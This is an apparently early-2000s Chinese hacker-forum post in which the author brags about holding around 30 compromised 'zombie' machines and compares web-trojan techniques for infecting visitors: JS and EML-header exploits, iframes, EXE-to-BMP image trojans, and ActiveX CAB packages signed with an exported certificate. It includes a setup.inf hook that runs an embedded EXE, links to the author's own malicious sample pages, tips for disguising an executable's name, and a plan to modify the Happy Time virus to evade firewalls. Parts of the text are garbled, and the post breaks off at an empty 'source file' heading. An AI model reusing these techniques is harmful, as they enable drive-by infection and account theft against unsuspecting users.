要知道“大虾走门,菜鸟走窗”我说的。我是个菜菜鸟所以我知道这一
点,我是靠送别人礼物让她开窗来完成进入她家的。不像那些大虾直接进出
不用送东东,我有QQ发给“好友”带木的照片来完成进入,再由她机器收到
的QQ在发… 好累!有了些成就好像最多时有30多个肉鸡,但免费的空间要收
费了(免费餐不多了)几个星期的心血白费。主要是没有时间,还好上黑白上
看到了网页木马-图片木马,对我这样的菜鸟来说就是个天大的好事,放到网
页上成功。什么还有EML头啊太好了不用自己动手全搞定。时之不常我的肉鸡
又由多变少了为什么呢!到网吧一试才知道这全过时了,网吧装了金山防火和
还原精灵,一上网页就杀之!怎么办只有自己动手了!
(一)首先我想了想自己知道的网页木马的优点和不足:
一,JS.Exception.EXploit
“雪峰,我的首页被改,桌面被…”QQ上的好友向我求救,“老大,和
你学了这么多年电脑怎么还在网虫的页上被黑,告诉你上黑白上学学吧
要不千万别上菜鸟页上玩,要不会死的”
二,EML头
“小弟前些天给我的QQ全没了”,“黑鸟大哥十几个全没了不会吧是不
是你的机器…”打车前去看了看,发现TEMP里有个EXE名为QQpass这不
是收QQ的东东,虽没用过非它不过了。“大哥,你常写信吗”“不啊,
为什么会被偷呢,我有防火墙呀是新买的”“不要让我来教你吧,你可
是我的老师,亡羊补牢你不知道吗?防是在发毒发之后不多说了,你要
不打个补丁,要不就卸了收信程序吧”
三,iframe
漏洞也不太会用,但看介绍还好用。
四,.EXE to .BMP + JS.Exception.EXploit
这就是图片木马吧,但我不喜欢JS,这种网虫页里的东东防火墙叫个不
停,还会驱走很多访客,黑下注册表肯定也会被人改回的,而后的.VBS
还会有什么用呢,它是在下次开机才运行的。但我喜欢做这个.BMP的那
个老师,原理是好的。(下面我用到了)
*五,通过安全认证的CAB , COX
这使我这个菜菜鸟无能为力,百分百中招了,试求哪位大虾也帮我把我
的文件上签个微软的大名要年头长些的,要不老过期。
(在黑白上没看到这个源码,所以自己改过加上)
原理:IE读文件时会有文件读不出,就会去“升级”这样它会在网页中指定的位置找 .cab
并在系统里写入个CID读入 .cab 里的文件。
方法:.cab是WINDOWS里的压缩文件,我们知道IE里所用的安全文件是用签名的CAB也不例
外,所做的CAB是经过安全使用证书异入的。也就是说IE认证攻击,只所以每次都能
入侵我的脑,是因为它通过的是IE认证下的安全攻击,这样不管我怎么做都没办法。
制做方法:因本人水平有限(参)
软件:1.安全证书管理。 2.CAB压缩或安装盘制做
先到,IE里找安全-内容,里面有证书,我们找一个就行。导出 *.CER
在用证书管理打开*.CER 导出证书.SPC和密钥.PVK。
这样我们就可以做 .cab 了。
做一个setup.inf
[Setup Hooks]
hook1=hook1
[hook1]
run=%EXTRACT_DIR%\文件.exe
[Version]
Signature=$CHICAGO$
AdvancedInf=2.0
最重要我所用的是安装盘制做,ADD sdtup.inf OR 文件.exe
然后 导入证书.SPC和密钥.PVK。
实例在我的免费空间上不过下载的是成人拔号器千万别点
(合法的签名)是安全的
http://jzs.3322.net/live/index.html
六,VBScript
我想这是很多病毒最爱用的了不用多说吧网页和文件常用的语言。
七,综合所感优点组合
iframe 成两个窗,其一为.BMP+VBScript
其二为EML头的变种.mht(真对打了打补丁的不会做,可以用网页合并器合成)
实例没试过成功的话在桌面上多个“女友������������爱������������你�
����������.EXE”文件加长为的是不要她看到EXE。晕!图标没改以后在说。
网址 http://jzs.3322.net/inbb.htm
总,试我的方法在自己机器上运行成功,只因时间有限源码没转成BMP,你可以
自己转下,黑白上有不多说。我做的源码里没加RUN “文件路径”,如果加了
就可以自动运行没有问题,对于网吧的还原精灵吗,有个还原精灵清除器很好用的。
(二)想像与求助
八,运用ASP因为它内置了VBS
我想的不知道是不可行,因VBS功能很强大,但ASP内的VBS和文件里的有些
差别不能放之就用,我又菜希望有人帮,自己做的可以改自己的注册表,但
改别人的没试成(是不是我用的是自己的服务器呢别人的ASP空间不开脚本)
大虾帮我写个文章<<ASP做网页木马>>
九,运用Flash的动作VBS
看过6.0里好像可以但不太会,我想可行,�绻镂倚次蚁刃涣?
十,以避防火,可以改下欢乐时光的源码
这个不多说,您可能听过它是病毒了,它不比ActiveX,JS还可以碰到注册表
那只不过是个脚本吗,欢乐时光是病毒防火全防在外的,没办法改改吧,谁让
它用的原理好呢,我试过把它的13号发做删了(太毒了)但防火还防。如果大虾
可以帮我上网下个源码吧,要不找我雪峰要也行我把写过的放到文尾。注意呀
不要在自己的机器上试呀,我试了传染的几秒的事,整个系统呀,手工杀了我
半个多小时,我没杀的软件。
源文件:
|